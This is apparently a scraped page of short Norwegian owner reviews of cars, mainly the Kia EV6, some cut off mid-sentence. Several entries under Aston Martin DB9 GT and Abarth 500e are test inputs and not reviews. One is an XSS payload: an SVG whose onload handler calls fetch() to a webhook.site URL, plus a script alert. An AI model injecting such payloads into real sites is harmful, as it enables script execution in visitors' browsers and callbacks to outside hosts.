Vurdert av Thefutureiselectric
Kia EV6 (2025)
Skikkelig kjøremaskon som er ganske gjerrig på strømmen så man lader skjeldent og kort.
Kia EV6 (2025)
En helt grei bil, men skuffet over generelt opplevd kvalitet. Bilen går langt, og lader raskt. Ellers veldig dårlige nær, og fjernlys. Fått denne da som firmabil, om det er mulig. Så kjøp GT utg
Kia EV6 (2025)
Veldig god bil. Rask lading og veldig god rekkevidde. Lavt forbruk. Barna mente det var «unødvendig god plass» i baksetet
Kia EV6 (2024)
En super følese vær gang.. har hatt den nå i 11 mnd. skiftet fra ny toyota bz4x som jeg ikke likte.. Var masse tull og tøvete løsninger.
Kia EV6 (2023)
Fantastisk god bil. Veldig fornøyd
Kia EV6 (2023)
Nydelig bil
Kia EV6 (2023)
Svært god bil.
Kia EV6 (2023)
Meget bra bil
Kia EV6 (2023)
Veldig godt fornøyd med både bilen og forhandler. Ingen drifts utfordringer så langt.
Kia EV6 (2023)
Superfornøyd med det meste.
Kia EV6 (2023)
Fatter ikke at ikke flere har kjøpt denne bilen. For oss som er over to meter på sokkelesten, så er det en fantastisk plass på førersiden og jeg har plass til voksne bak meg. Bagasjerommet er ogs
Kia EV6 (2023)
Fatter ikke at ikke flere har kjøpt denne bilen. For oss som er over to meter på sokkelesten, så er det en fantastisk plass på førersiden og jeg har plass til voksne bak meg. Bagasjerommet er ogs
Kia EV6 (2023)
.
Kia EV6 (2023)
Linjelekker og behagelig bil for både de lange og de korte turene. God sommer som vinter, kjennes trygg, og innbyr aldri til å presse bilen utover sine begrensninger. Greit underholdningsanlegg, hvo
Kia EV6 (2022)
Dette er en førsteutgave, og med de er det en del barnesykdommer. Så også for EV6. Det mest positiver er rekkevidde, forbruk og ladehastighet i tillegg til lang garanti. Dette var hovedargument for
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat